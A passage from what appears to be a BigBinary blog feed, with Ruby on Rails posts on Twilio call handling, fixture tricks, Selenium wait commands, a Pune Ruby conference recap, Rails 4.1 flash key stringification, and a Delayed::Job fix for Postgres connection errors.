callerId=&quot;+15005550000&quot;&gt;    &lt;Number&gt;+15005550001&lt;/Number&gt;  &lt;/Dial&gt;&lt;/Response&gt;</code></pre><p>We are making use of two elements here - <code>Dial</code>, which makes Twilio place a call using defined <code>callerId</code> value,as the number from which the call is made, which is displayed on the callee's phone. Note that this is the same verifiednumber that we had specified before. Then we specify <code>Number</code> which is the number, to which we want to place the call to.This number is passed first by the javascript client to Twilio, and then back to our application by Twilio,which we use to generate the response as above.</p><p>We define our <code>TwilioCallTwiMLGeneratorService</code> to take in a phone number as parameter. It creates an instance of<code>Twilio::TwiML::Response</code> and tapping on this instance we provide <code>Dial</code> element with a <code>:callerId</code> value, and the <code>Number</code>to place the call to. We validate the number before passing it back, and return an error if the number is invalid.</p><pre><code class="language-ruby">class TwilioCallTwiMLGeneratorService  attr_reader :phone_number  VALID_PHONE_NUMBER_REGEX = /^[\d\+\-\(\) ]+$/ # Matches valid phone numbers acceptable to Twilio  def initialize phone_number    @phone_number = phone_number  end  def process    Twilio::TwiML::Response.new do |r|      if VALID_PHONE_NUMBER_REGEX.match(phone_number)        r.Dial :callerId =&gt; Settings.twilio.verified_number do |d| # callerId is number from which call is made.          d.Number(CGI::escapeHTML phone_number) # The number to call        end      else        r.Error(&quot;Invalid number!&quot;)      end    end.text.strip  endend</code></pre><h2>Step 6 - Send TwiML response on Twilio callback</h2><p>We are now set to define twilio's callback handler. This will be handled by the <code>create_call</code> action in <code>CallsController</code>.Twilio will be sending this endpoint a <code>POST</code> request along with some information specified <a href="https://www.twilio.com/docs/api/twiml/twilio_request">here</a>.We make use of <code>phone_number</code> being passed to us by Twilio and pass it along to the <code>TwilioCallTwiMLGeneratorService</code>, whichreturn us with valid <code>TwiML</code> response. Since <code>TwiML</code> is a flavor of <code>XML</code>, we make using <code>render xml</code> to return the response.</p><pre><code class="language-ruby">def create_call  response_to_twilio_callback = TwilioCallTwiMLGeneratorService.new(call_params[:phone_number]).process  render xml: response_to_twilio_callbackenddef call_params  params.permit(:phone_number)end</code></pre><p>As <code>create_call</code> endpoint will be used by Twilio API, we need to skipauthenticity token check for this action.</p><pre><code class="language-ruby">class CallsController &lt; ApplicationController  skip_before_action :verify_authenticity_token, only: [:create_call]end</code></pre><p>Finally we need to specify the callback url in our <code>TwiML</code> App on Twilio. For testing this locally, we can make use of aservice like <code>https://ngrok.com/</code>, to expose this endpoint.</p><p>Our service is now ready to place calls. The complete Rails application code that we have created can be found <a href="https://github.com/bigbinary/twilio-rails">here</a>.</p><p>Happy calling everyone!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Tricks and Tips for using Fixtures effectively in Rails]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/tricks-and-tips-for-using-fixtures-in-rails"/>
      <updated>2014-09-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tricks-and-tips-for-using-fixtures-in-rails</id>
      <content type="html"><![CDATA[<p>Recently I gave a talk at <a href="http://rubykaigi.org/2014">RubyKaigi 2014</a>about Rails fixtures. Inthis blog post I will be discussing some of the tips and tricks for using fixtures effectively.</p><p>_You can also the see the video of this talk&lt;iframe width=&quot;100%&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/AFDwI1oIgxk&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot; allowfullscreen&gt;&lt;/iframe&gt;</p><h2>Don't use ids.. unless required</h2><p>In fixtures, we can specify id of a fixture.</p><pre><code class="language-yaml">john:  id: 1  email: john@example.com</code></pre><p>I would recommend not to specify the id. Rails generates the idautomatically if we don't explicitly specify it. Moreover there are a few more advantages of not specifying the id.</p><h2>Stable ids for every fixture.</h2><p>Rails will generate the id based on key name. It will ensurethat the id is unique for every fixture. It can also generate ids foruuid primary keys.</p><h2>Labeled references for associations like belongs_to, has_many.</h2><p>Lets say we have a users table. And a user has many cars.</p><p>Car <code>ferrari</code> belongs to <code>john</code>. So we have mentioned <code>user_id</code> as 1.</p><pre><code class="language-yaml">ferrari:  name: ferrari  make: 2014  user_id: 1</code></pre><p>When I'm looking at <code>cars.yml</code> I see <code>user_id</code> as 1. But now I to lookup to see which user has id as 1.</p><p>Here is another implementation.</p><pre><code class="language-yaml">john:  name: john  email: john@example.comferrari:  name: ferrari  make: 2014  user: john</code></pre><p>Notice that I no longer specify <code>user_id</code> for John. I have mentioned <code>name</code>. And now I can reference that name in <code>cars.yml</code> to mention that <code>ferrari</code>belongs to <code>john</code>.</p><h2>How to set a value to nil from fixture</h2><p>Let's say that I have a boolean column which is <code>false</code> bydefault. But for an edge case, I want it to be nil. I can obviouslymutate the data generated by fixture before testing. However I canachieve this in fixtures also.</p><h2>Specify null to make the value nil</h2><pre><code class="language-ruby">require 'yaml'YAML.load &quot;--- \n:private: null\n&quot;)=&gt; {:private=&gt;nil}</code></pre><p>As you can see above if the value is <code>null</code> then YAML will treat it as <code>nil</code>.</p><pre><code class="language-yaml">john:  name: john  email: john@example.com  private: null</code></pre><h2>Leave the value blank to make the value nil</h2><pre><code class="language-ruby">require 'yaml'YAML.load &quot;--- \n:private: \n&quot;)=&gt; {:private=&gt;nil}</code></pre><p>As you can see above if the value is blank then YAML will treat it as <code>nil</code>.</p><pre><code class="language-yaml">john:  name: john  email: john@example.com  private:</code></pre><h2>When model name and table name does not match</h2><p>Generally in Rails, the model name and table name follow a strict convention. <code>Post</code> model will have table name <code>posts</code>.Using this convention, the fixture file for <code>Post</code> models is obviously <code>fixtures/posts.yml</code>.</p><p>But sometimes models do not match directly with the table name. This could be because of legacy reason or because of namespacing of models.In such cases automatic detection of fixture files becomes difficult.</p><p>Rails provides <code>set_fixture_class</code> method for this purpose. This is a class method which accepts a hash where key shouldbe name of the fixture or relative path to fixture file and value should be model class.</p><p>I can use this method inside <code>test_helper.rb</code> in any class inheriting from <code>ActiveSupport::TestCase</code>.</p><pre><code class="language-ruby"># test_helper.rbclass ActiveSupport::TestCase  # table name is &quot;morning_appts&quot;. It is being mapped to model &quot;MorningAppointment&quot;.  self.set_fixture_class morning_appts: MorningAppointment  # in this case fixture is namespaced  self.set_fixture_class '/legacy/users' =&gt; User  # in this case the model is namespaced.  self.set_fixture_class outdoor_games: Legacy::OutdoorGameend</code></pre><h2>values interpolation using $LABEL</h2><p>Rails provides many ways to keep our fixtures DRY. Label interpolationis one of them. It allows the use of key of fixture as a value in thefixture. For example:</p><pre><code class="language-yaml">john:  name: john  email: john@example.com</code></pre><p>becomes:</p><pre><code class="language-yaml">john:  name: $LABEL  email: john@example.com</code></pre><p>$LABEL is not a global variable here. Its just a placeholder.$LABEL is replaced by the key of the fixture. And as discussed earlier the key of the fixture in this case is <code>john</code>.So $LABLE has value <code>john</code>.</p><p>Before <a href="https://github.com/rails/rails/pull/14399">this PR</a>, I could only usethis feature if the value is exactly $LABEL. So if the email is<code>john@example.com</code> I could not use the <code>$LABEL@example.com</code>.But after this PR, I can $LABEL anywhere in the string, and Railswill replace it with the key.</p><p>So the earlier example becomes:</p><pre><code class="language-yaml">john:  name: $LABEL  email: $LABEL@example.com</code></pre><h2>YAML defaults</h2><p>I use YAML defaults in database.yml for drying it up and keepingcommon configuration at one place.</p><pre><code class="language-yaml">defaults: &amp;defaults  adapter: postgresql  encoding: utf8  pool: 5  host: localhost  password:development:  &lt;&lt;: *defaults  database: wheel_developmenttest:  &lt;&lt;: *defaults  database: wheel_testproduction:  &lt;&lt;: *defaults  database: wheel_production</code></pre><p>I can use it for drying up fixtures too for extracting common part inour fixtures.</p><pre><code class="language-yaml">DEFAULTS: &amp;DEFAULTS  company: BigBinary  website: bigbinary.com  blog: blog.bigbinary.comjohn:  &lt;&lt;: *DEFAULTS  name: John Smith  email: john@bigbinary.comprathamesh:  &lt;&lt;: *DEFAULTS  name: Prathamesh Sonpatki  email: prathamesh@bigbinary.com</code></pre><p>Note the usage of key <code>DEFAULTS</code> for defining default fixture.Rails will automatically ignore any fixture with key <code>DEFAULTS</code>.</p><p>If we use any other key then a record with that key will also get insertedin the database.</p><h2>Database specific tricks</h2><p>Fixtures bypass the normal Active Record object creation process.After reading them from YAML file, they are inserted into databasedirectly using insert query. So they skip callbacks and validationscheck. This also has an interesting side-effect which can be used fordrying up fixtures.</p><p>Suppose we have fixture with timestamp:</p><pre><code class="language-yaml">john:  name: John Smith  email: john@example.com  last_active_at: &lt;%= Time.now %&gt;</code></pre><p>If I are using PostgreSQL, I can replace the <code>last_active_at</code> valuewith <code>now</code>:</p><pre><code class="language-yaml">john:  name: John Smith  email: john@example.com  last_active_at: now</code></pre><p><code>now</code> is not a keyword here. It is just a string. The actual querylooks like this:</p><pre><code class="language-sql">INSERT INTO &quot;users&quot;(&quot;name&quot;, &quot;email&quot;, &quot;last_active_at&quot;, &quot;id&quot;)VALUES('John Smith', 'john@example.com', 'now',1144934)</code></pre><p>So the value for <code>last_active_at</code> is still just <code>now</code> when the queryis executed.</p><p>The magic starts as PostgreSQL starts reading the values. <code>now</code> isa shorthand for the current timestamp . As soon as Postgres reads it,it replaces <code>now</code> with the current timestamp and the column <code>last_active_at</code> gets populated with current timestamp.</p><p>I can also use the <code>now()</code> function instead of just <code>now</code>.</p><p>This function is available in<a href="http://www.postgresql.org/docs/9.3/static/datatype-datetime.html#AEN5861">PostgreSQL</a>as well as<a href="http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html#function_now">MySQL</a>. So the usage of<code>now()</code> works in both of these databases.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Selenium IDE - Reducing time from 58 min to 15 min]]></title>
       <author><name>Prabhakar Battula</name></author>
      <link href="https://www.bigbinary.com/blog/how-i-reduced-selenium-test-run-time-from-58-minutes-to-15-minutes"/>
      <updated>2014-09-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-i-reduced-selenium-test-run-time-from-58-minutes-to-15-minutes</id>
      <content type="html"><![CDATA[<p>I wrote a bunch of selenium tests using<a href="http://www.seleniumhq.org/download">Selenium IDE</a> for a project. The seleniumtests have proven to be very useful. However the tests take around 58 minutes tocomplete the full run.</p><p>Here are the specific steps I took which brought the running time to under 15minutes.</p><h2>Set to run at the maximum speed</h2><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Command &lt;/td&gt;&lt;td&gt; Target &lt;/td&gt;&lt;td&gt; Value &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;setSpeed &lt;/td&gt;&lt;td&gt;0 &lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><p><code>setSpeed</code> command takes <code>Target</code> value in milliseconds. By setting the value tozero, I set the speed to maximum and the tests indeed ran fast. However, now Ihad lots of tests failing which were previously passing.</p><p>What happened.</p><p>In our tests real firefox browser is fired up and real elements are clicked. Theapplication does make round trip to the rails server hosted on heroku.</p><p>By setting the selenium tests to the maximum speed the selenium tests startedasserting for elements on the page even before the pages were fully loaded bythe browser.</p><p>I needed sets of instructions using which I could tell selenium how long to waitfor before asserting for elements.</p><p>Selenium provides a wonderful suite of commands which helped me fine tune thetest run. Here I'm discussing some of those commands.</p><h2>waitForVisible</h2><p>This command is used to tell selenium to wait until the specified element isvisible on the page.</p><p>In the below mentioned case, the Selenium IDE will wait until the element<code>css=#text-a</code> is visible on the page.</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Command&lt;/td&gt;&lt;td&gt; Target&lt;/td&gt;&lt;td&gt; Value&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;waitForVisible&lt;/td&gt;&lt;td&gt;css=#text-a&lt;/td&gt;&lt;td&gt; &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><h2>waitForText</h2><p>This command is used to tell selenium to wait until a particular text is visiblein the specified element.</p><p>In the case mentioned below, Selenium IDE will wait until the text <code>violet</code> isdisplayed in the element <code>css=#text-a</code>.</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Command&lt;/td&gt;&lt;td&gt; Target&lt;/td&gt;&lt;td&gt; Value&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;waitForText&lt;/td&gt;&lt;td&gt;css=#text-a&lt;/td&gt;&lt;td&gt;violet&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><p>&lt;br /&gt;</p><p>The difference between <em>waitForVisible</em> and <em>waitForText</em> is that<strong>waitForVisible waits until the specified element is visible on the page</strong>while <strong>waitForText waits until a particular text is visible in the specifiedelement on the page</strong>.</p><h2>waitForElementPresent</h2><p>This command is used to tell Selenium to wait until the specified element isdisplayed on the page.</p><p>In the below mentioned case, the Selenium IDE will wait until the element<code>css=a.button</code> is displayed on the page.</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Command&lt;/td&gt;&lt;td&gt; Target&lt;/td&gt;&lt;td&gt; Value&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;waitForElementPresent&lt;/td&gt;&lt;td&gt;css=a.button&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><p><em>waitForVisible</em> and <em>waitForElementPresent</em> seem very similar. It seems both ofthese commands do the same thing. There is a subtle difference though.</p><p><em>waitForVisible</em> waits until the specified element is visible. Visibility of anelement is manipulated by the settings of CSS properties. For example using<code>display none;</code> one can make an element not be visible at all.</p><p>In contrast the command <em>waitForElementPresent</em> waits until the specifiedelement is present on the page in the form of html markup. This command does notgive consideration to css settings.</p><h2>refreshAndWait</h2><p>This command is used to tell Selenium to wait until the page is refreshed andthe targeted element is displayed on the web page.</p><p>In the example mentioned below, the Selenium IDE will wait until the page isrefreshed and the targeted element <code>css=span.button</code> is displayed on the page.</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Command&lt;/td&gt;&lt;td&gt; Target&lt;/td&gt;&lt;td&gt; Value&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;refreshAndWait&lt;/td&gt;&lt;td&gt;css=span.button&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><h2>clickAndWait</h2><p>This command is used to tell selenium to wait until a particular button isclicked for submitting the form and the page starts reloading. The subsequentcommands are paused until, the page is reloaded after the element is clicked onthe page.</p><p>In the case mentioned below, Selenium IDE will wait until the page is reloadedafter the specified element <code>css=input#edit</code> is clicked.</p><p>&lt;table&gt;&lt;tr&gt;&lt;td&gt; Command&lt;/td&gt;&lt;td&gt; Target&lt;/td&gt;&lt;td&gt; Value&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;clickAndWait&lt;/td&gt;&lt;td&gt;css=input#edit&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</p><p>Selenium IDE commands used above and more are available at<a href="http://docs.seleniumhq.org/docs/02_selenium_ide.jsp#selenium-commands-selenese">Selenium documentation</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[DeccanRubyConf 2014. Hou De!]]></title>
       <author><name>Santosh Wadghule</name></author>
      <link href="https://www.bigbinary.com/blog/deccanrubyconf"/>
      <updated>2014-08-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deccanrubyconf</id>
      <content type="html"><![CDATA[<p><img src="/blog_images/2014/deccanrubyconf/deccanrubyconflogo.png" alt="deccanrubyconflogo"></p><p>I attended it, enjoyed it and took part as a volunteer in Pune's firstRubyConf - <a href="http://www.deccanrubyconf.org/">DeccanRubyConf 2014</a>. As <strong><em>HouDe</em></strong> (let it be) name said, event went in the same way.</p><p>The day before conference, in the morning<a href="http://twitter.com/vipulnsward">Vipul</a> (one of the event organizers) and Ipicked up our guest speaker <a href="https://twitter.com/_ko1">Koichi Sasada</a> from thePune Airport. Koichi is a Ruby core member and works for<a href="https://www.heroku.com/">Heroku</a>. We welcomed him and went to Hyatt Regencyhotel where the event is taking place. Our guest checked into hotel and then wedecided to go for a lunch at Malaka Spice restaurant.</p><p>We reached there and Koichi told us that he wanted non-spicy food (Safe food).We ordered non spicy food, but food was still too spicy for Koichi. However weenjoyed the food and had very good discussion about the Ruby internals,concurrency-parallelism, debugging in Ruby, Japanese culture and the Indianculture.</p><p><img src="/blog_images/2014/deccanrubyconf/koichi_vipul_santosh.jpg" alt="koichi &amp; vipul"></p><p>After lunch, we dropped Koichi off at the hotel and we left for our home.</p><p>Next morning was the event day and I woke up early and went to the event place.As part of volunteering team, I and other volunteers had tasks like giving pens,badges, stickers, T-shirts and coupon for night party to the attendees.</p><p>Attendees had started to come in slowly. Some attendees asked me about T-shirtsize as I wore one of the conference T-shirts and from my T-shirt's size theydecided their T-shirt size. It was a great experience meeting with differentkind of people from around the India.</p><p>Keynote by Koichi kicked the event off and he talked about <strong><em>Ruby 2.1features</em></strong> like,</p><ul><li>Required keyword parameter,</li><li>Rational number literal,</li><li>def returns symbol of method name</li><li>Runtime new features (<code>String#scrub</code>, <code>Binding#local_time</code> and etc.)</li></ul><p>Then he talked about <strong><em>performance improvements</em></strong>, <strong><em>Ruby 2.2</em></strong> and how to<strong><em>speed up Ruby Interpreter</em></strong> . Click<a href="http://www.atdot.net/~ko1/activities/2014_deccanrubyconf_pub.pdf">here</a> formore details about his talk.</p><p><img src="/blog_images/2014/deccanrubyconf/koichi.jpg" alt="koichi"></p><p><img src="/blog_images/2014/deccanrubyconf/attendees.jpg" alt="attendees"></p><p>In between the talks, some new attendees had come for the conference who had notregistered for the conference. They told me that they thought it's a regularPune's local Ruby Meetup. There was some miss-understandings but they seemedinterested in attending the event. I contacted<a href="https://twitter.com/gautamrege">Gautam</a> as he was one of the organizers andtold him about the issue.</p><p>Attendees kept coming till the afternoon.</p><p>After Koichi's talk, two sections had opened. One for talks and other for theworkshops. TDD workshop was conducted by<a href="https://twitter.com/ponnappa">Sidu Ponnappa</a>. I saw lots of attendees in thisworkshop and heard that it went very well.</p><p><img src="/blog_images/2014/deccanrubyconf/tddworkshop.jpg" alt="tddworkshop"></p><p>The next talk was on <strong><em>Requiem for a dream</em></strong> by<a href="https://twitter.com/or9ob">Arnab Deka</a>. He talked about various tips and tricksincluding using &quot;Higher order functions and Concurrency&quot; in Ruby and otherprogramming languages like Clojure and Elixir.</p><p>After that, <a href="https://twitter.com/jainrishi15">Rishi Jain</a> talked about <strong><em>GameDevelopment - The Ruby Way</em></strong>. He discussed how to build a game in Ruby using<a href="http://www.libgosu.org/">Gosu</a> library . It was a very useful session for gamedevelopers. You can find out more about it<a href="https://speakerdeck.com/rishijain/game-development-the-ruby-way-dot">here</a></p><p>Next talk was on <strong><em>Programming Ruby in Marathi</em></strong> by<a href="https://twitter.com/rtdp">Ratnadeep Deshmane</a> &amp; his friend<a href="https://twitter.com/aniketawati">Aniket Awati</a>. This was one of the best talksof the event. The way they used the similar words from Marathi for Ruby'skeywords and the examples made this talk remarkable. Their presentation stylewas nice too. Almost all attendees enjoyed this talk and they laughed a lot.</p><p>After this talk there was tea break for 15 minutes. Staffs from the Hyatt hotelwere very helpful. There were serving tea and coffees to the attendees andoverall did a good job of ensuring the event cruised along smoothly. This is insharp contrast to the service RubyConfIndia received from Lalit Resort.</p><p>After tea break, I didn't get chance to attend other talks as attendees werestill coming in and I was assisting them. But I heard almost all talks went verywell.</p><p>In meantime, I was passing through main passage and I saw lighting talks boardand decided to give lighting talk on my Ruby gem. Lighting talks is a shortpresentation that you can give about your achievement. You can also share yourideas and promote your library or any other projects.</p><p>Then we all had our lunch, lunch was good with lots of varieties with dessert.</p><p>After lunch I went for workshop on <strong><em>Deliver projects 30% faster, know yourCSS</em></strong> by <a href="https://twitter.com/aakashd">Aakash Dharmadhikari</a>. Wanted to attendit fully, but some of the attendees had difficulties in internet connection, soI left the room to look into it.</p><p>Lightning talks were going to start so I took sometime to prepare for mypresentation.</p><p>In the lighting talks, girls from Rails Girls Summer of Code, talked about theirproject and their progress on it. After that<a href="https://twitter.com/_cha1tanya">Prathamesh</a> talked about<a href="http://www.rubyindia.org/">RubyIndia.org</a> and asked people to subscribe thenewsletter. After that I gave talk on my Ruby gem <strong><em>RubySimpleSearch</em></strong> and youcan find more on it <a href="https://github.com/mechanicles/ruby_simple_search">here</a>.The next speaker <a href="https://twitter.com/Rahul_Mahale">Rahul Mahale</a> from Nashikasked people to help him in growing Ruby community in Nashik. All other lightingtalks went very well.</p><p><img src="/blog_images/2014/deccanrubyconf/santosh.jpg" alt="santosh"></p><p>After lighting talks, there was closing keynote <strong><em>On Solving Problems</em></strong> by<a href="https://twitter.com/ghoseb">Baishampayan Ghose</a>. This talk made us think abouthow we write application in our daily routine. He talked about the architectureand he also explained the future is a function of past <code>future = f(past)</code>. Healso suggested that we should first understand the problem thoroughly and weshould build the software. Talk was very informative and went very well.</p><p>After that Gautam came on to the stage and congratulated all the sponsors,organizers and volunteers. He also told that this event got large number ofgirls attendees than he had ever seen in any other conference.</p><p>After this event, there was party in Irish Village hotel. Me and my friends, weall went to the party. Party was superb and we all enjoyed it.</p><p><img src="/blog_images/2014/deccanrubyconf/futsal.jpg" alt="futsal"></p><p>Thanks to all <a href="http://www.deccanrubyconf.org/#sponsors">sponsors</a> and organizerswho made this event fun and enjoyable.</p><p>You can checkout more pictures of the conference from<a href="https://www.flickr.com/photos/deccanrubyconf">here</a>.</p><p><em>Note: Photos are copyrighted by respective photo owners.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Flash access changes in Rails 4.1]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/flash-access-changes-rails-4-1"/>
      <updated>2014-07-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/flash-access-changes-rails-4-1</id>
      <content type="html"><![CDATA[<p>Prior to upgrading to Rails 4.1 we had a helper to display flash messages and to add css class to the messagebased on flash type. Here is the code.</p><pre><code class="language-ruby">module FlashHelper  ALERT_TYPES = [:success, :info, :warning, :danger]  def bootstrap_flash    flash_messages = []    flash.each do |type, message|      next if message.blank?      type = :success if type == :notice      type = :danger  if type == :alert      type = :danger  if type == :error      next unless ALERT_TYPES.include?(type)      ....      Array(message).each do |msg|        text = content_tag(:div, msg.html_safe, :class =&gt; &quot;alert fade in alert-#{type} &quot;)        flash_messages &lt;&lt; text if msg      end    end    flash_messages.join(&quot;\n&quot;).html_safe  endend</code></pre><p>After upgrading to Rails 4.1, we started using the new <a href="http://guides.rubyonrails.org/upgrading_ruby_on_rails.html#cookies-serializer">Cookies serializer</a>. Following code was added to an initializer.</p><pre><code class="language-ruby">  Rails.application.config.action_dispatch.cookies_serializer = :json</code></pre><p>Soon after this our flash helper started misbehaving and all flash messages disappeared from the application.</p><h2>JSON Cookies Serializer</h2><p>Before we move ahead, a word on the new JSON Cookies Serializer. Applications created before Rails 4.1 uses Marshal to serialize cookie values into the signed and encrypted cookie jars.</p><p>Commits like <a href="https://github.com/rails/rails/pull/13692">this</a> and <a href="https://github.com/rails/rails/pull/13945">this</a>made it possible to have Cookies serializer and defaulted from Marshal Serializer to a secure Serializer using JSON.</p><p>The JSON Serializer works on JSON objects. Thus objects like <code>Date</code> and <code>Time</code> will be stored as strings. Hash keys will be stored as strings.</p><p>JSON serializer makes the application much safer since it is safer to pass around strings compare to passing around arbitrary values which is what was happens when values are marshalled and passed around.</p><p>Coming back to our problem, change <a href="https://github.com/rails/rails/commit/a668beffd64106a1e1fedb71cc25eaaa11baf0c1">Stringify the incoming hash in FlashHash</a> coupled with above serialization changes meant that even if we put a symbol as a key in the flash we have to retrieve it as &quot;string&quot; since the keys are internally being converted into strings.</p><p>The difference is clearly illustrated below.</p><pre><code class="language-ruby">flash[&quot;string&quot;] = &quot;a string&quot;flash[:symbol] = &quot;a symbol&quot;# Rails &lt; 4.1flash.keys # =&gt; [&quot;string&quot;, :symbol]# Rails &gt;= 4.1flash.keys # =&gt; [&quot;string&quot;, &quot;symbol&quot;]</code></pre><h2>Solution</h2><p>Now that we know the root cause of the problem the fix was simple. Instead of relying on symbols use &quot;string&quot; to access value from flash.</p><pre><code class="language-ruby">module BootstrapFlashHelper  ALERT_TYPES = ['success', 'info', 'warning', 'danger']  def bootstrap_flash    flash_messages = []    flash.each do |type, message|      compare_type = type.to_s # Notice the stringifying of keys here, to make this work even with symbols.      next if message.blank?      compare_type = 'success' if compare_type == 'notice'      compare_type = 'danger'  if compare_type == 'alert'      compare_type = 'danger'  if compare_type == 'error'      next unless ALERT_TYPES.include?(compare_type)      Array(message).each do |msg|        text = content_tag(:div, msg.html_safe, :class =&gt; &quot;alert fade in alert-#{compare_type} &quot;)        flash_messages &lt;&lt; text if msg      end    end    flash_messages.join(&quot;\n&quot;).html_safe  endend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Issue with Delayed Job lifecycle and Postgres Errors]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/delayed-job-lifecycle-issue"/>
      <updated>2014-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/delayed-job-lifecycle-issue</id>
      <content type="html"><![CDATA[<p>Recently in one of our projects,we experienced some strange errors from<a href="https://github.com/collectiveidea/delayed_job">Delayed::Job</a>.<code>Delayed::Job</code> workers started successfully,but when they were starting to lock the jobs, workers failedwith <code>PG::Error: no connection to server</code> or<code>PG::Error: FATAL: invalid frontend message type 60</code>errors.</p><p>After some search, we found there had been such issuesalready<a href="https://github.com/collectiveidea/delayed_job/issues/473">experienced</a>byothers (Link is not available) .</p><p>We started isolating the problem and digging through the recent changes we had made to the project. Since the last releasethe only significant modification had been made to internationalization. We had startedusing <a href="https://github.com/svenfuchs/i18n-active_record">I18n-active_record</a> .</p><pre><code class="language-ruby"># config/initializers/locale.rbrequire 'i18n/backend/active_record'Translation = I18n::Backend::ActiveRecord::Translationif (ActiveRecord::Base.connected? &amp;&amp; Translation.table_exists?) ||in_delayed_job_process?I18n.backend = I18n::Backend::ActiveRecord.newI18n::Backend::ActiveRecord.send(:include, I18n::Backend::Memoize)I18n::Backend::ActiveRecord.send(:include, I18n::Backend::Flatten)I18n::Backend::Simple.send(:include, I18n::Backend::Memoize)I18n::Backend::Simple.send(:include, I18n::Backend::Pluralization)I18n.backend = I18n::Backend::Chain.new(I18n::Backend::Simple.new, I18n.backend)end</code></pre><p>for Delayed Job we had extra check as</p><pre><code class="language-ruby">def in_delayed_job_process?executable_name = File.basename $0  arguments = $\*rake_args_regex = /\Ajobs:/(executable_name == 'delayed_job') || (executable_name == 'rake' &amp;&amp; arguments.find{ |v| v =~ rake_args_regex })end</code></pre><p>After some serious searching and digging through both <code>Delayed::Job</code> source code and how we were using to setup its config, we started noticing some issues.</p><p>The first thing we found was that the problem did not turn up when delayed job workers were started using <code>rake jobs:work</code> task.</p><p>After looking at DelayedJob internals we found that the main difference between a rake task and a binstub was in the <code>fork</code> method that was invoked in the binstub version.The binstub version was being executed seamlessly using <code>Daemons#run_process</code> method and had a slightly different lifecycle of execution.</p><h2>DelayedJob lifecycle</h2><p>Let's take a look into DelayedJob internals before proceeding. DelayedJob has systems of the hooks that can be used by plugin-writers and in our applications.All this events functionality is hidden in <code>Delayed::Lifecycle</code> class. Each worker has its own instance of that class.</p><p>So, which events exactly do we have here?</p><p>Job-related events:</p><pre><code class="language-ruby">:enqueue:perform:error:failure:invoke_job</code></pre><p>Worker-related events:</p><pre><code class="language-ruby">:execute:loop:perform:error:failure</code></pre><p>You can setup callbacks to be run on <code>before</code>, <code>after</code> or <code>around</code> events simply using <code>Delayed::Worker.lifecycle.before</code>,<code>Delayed::Worker.lifecycle.after</code> and <code>Delayed::Worker.lifecycle.around</code> methods.</p><h2>The Solution</h2><p>Let's move on to our problem. It turned out that<a href="https://github.com/collectiveidea/delayed_job_active_record">delayed job active record</a> gem was closing alldatabase connections in <code>before_fork</code> hook and reestablishing them in <code>after_fork</code> hook.It was clear that I18n-active-record did not play well with this, causing the issue at hand.</p><p>We looked into DelayedJob lifecycle and chose <code>before :execute</code> hook, which was executed after all DelayedJob ActiveRecord backend connections manipulations.</p><p>Finally the locales initializer for delayed_job workers was changed to match as below:</p><pre><code class="language-ruby">require 'i18n/backend/active_record'Translation = I18n::Backend::ActiveRecord::TranslationDelayed::Worker.lifecycle.before :execute doif (ActiveRecord::Base.connected? &amp;&amp; Translation.table_exists?) || in_delayed_job_process?I18n.backend = I18n::Backend::ActiveRecord.new    I18n::Backend::ActiveRecord.send(:include, I18n::Backend::Memoize)    I18n::Backend::ActiveRecord.send(:include, I18n::Backend::Flatten)    I18n::Backend::Simple.send(:include, I18n::Backend::Memoize)    I18n::Backend::Simple.send(:include, I18n::Backend::Pluralization)    I18n.backend = I18n::Backend::Chain.new(I18n::Backend::Simple.new, I18n.backend)endend</code></pre><p>This helped us to mitigate the connection errors, and connections stopped dying abruptly.</p>]]></content>
    </entry><entry>
       <title><![CDATA[RedDotRubyConf 2014]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/reddotrubyconf"/>
      <updated>2014-07-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/reddotrubyconf</id>
